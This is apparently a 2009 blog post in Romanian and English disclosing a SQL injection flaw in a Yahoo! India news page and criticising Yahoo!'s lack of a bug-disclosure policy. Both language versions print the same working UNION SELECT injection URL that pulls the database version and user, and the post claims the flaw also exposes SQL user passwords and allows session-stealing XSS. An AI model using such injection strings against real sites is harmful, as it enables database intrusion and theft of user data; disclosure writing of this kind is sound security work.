O companie care valoreaza miliarde de dolari si care se presupune ca ar trebui sa aibe doar programatori “buni”, programatori care nu lasa in urma lor gauri de securitate prin site-ul Yahoo!.
De XSS-uri se stie deja ca au fost destul de multe prin *.yahoo.com si totodata ca mai sunt si altele inca. Insa cand vine vorba de SQL Injection in yahoo.com, de privacy-ul promis de Yahoo! care pare sa se clatine, de posibilitatea de a avea acces la informatii private ale milioanelor de useri ai site-ului yahoo.com, gluma se ingroasa.

Sa continuam cu prezentarea vulnerabilitatii (gasita de Kenpachi si kw[3]rln @ hackersblog.org & rstcenter.com).
Una din paginile vulnerabile la SQL Injection: http://in.jagran.yahoo.com/article/index.php?choice=homepage_getnews&state=1&city=87%20union%20all%20select%201,concat_ws(0x203a20,version(),user()),3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18
Ce se vede aici? Informatii despre versiunea serverului SQL si userul curent de pe care se executa query-urile:

Listarea userelor SQL si parolele acestora:

Si, evident, multe altele.

Totodata, acest SQL Injection se poate folosi si pe post de XSS, folosit in special pentru furtul de sesiuni

Partea proasta e ca inca nu au adoptat o politica de recunoastere a bugurilor/vulnerabilitatilor din site-urile lor si a celor care le gasesc. Sa renunte la orgoliu si vor avea doar de castigat, majoritatea persoanelor care gasesc buguri in site-ul yahoo nu le mai dezvaluie tocmai din cauza asta. Totodata asta ar duce si la mai putine situatii neplacute gen conturi sparte / furate

===========================================================

English version:

A company worth billions of dollars which is supposed to have the best programmers, the kind of company that won’t leave any security wholes in the system. Yahoo! system that is!
XSS bugs are already yesterday’s news when we talk about Yahoo! They are all over the place on the *.yahoo.com subdomains.
But we are not talking here about minor XSS bugs. We mean serious business. We are talking about the kind of security which exposes the privacy of millions of users of the “trustable” Yahoo! services.
We are talking about SQL Injection. One of the worst kinds of security breach.

We will present here the vulnerability found by Kenpachi and kw[3]rln @ hackersblog.org & rstcenter.com .

Here you have one of the pages vulnerable to SQL Injection: http://in.jagran.yahoo.com/article/index.php?choice=homepage_getnews&state=1&city=87%20union%20all%20select%201,concat_ws(0x203a20,version(),user()),3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18
What do we find here? Information about the SQL server, its version and the current user SQL user:

A list with SQL users and passwords:

And of course, much more information available at the hand of an attacker.

Moreover, this SQL Injection can be used as an XSS, especially for session hijacking:

The sad part is that Yahoo! didn’t adopt any policy whatsoever regarding this kind of problems. They dont admit they have a problem, nor do they give any credits to those who find them.

Following in the footsteps of other sites, Yahoo! could learn to gain from this. Vast majority of those who find bugs don’t disclose them anymore precisely for the fact that Yahoo! is in total denial. By coming out clean, Yahoo! would also reduce the amount of hacked/stolen accounts and other shameful security breaches like the one we present here.

Related Posts

• January 22, 2009 -- Yahoo! again – XSS
• August 24, 2009 -- SQL Injection in Yahoo! kids website (patched)
• February 28, 2009 -- Sql Injection and XSS in Yahoo!’s services (again)
• February 11, 2009 -- F-Secure.com – SQL Injection + Cross Site Scripting
• February 9, 2009 -- [Hacked]Bitdefender (Portugal) exposes sensitive customer data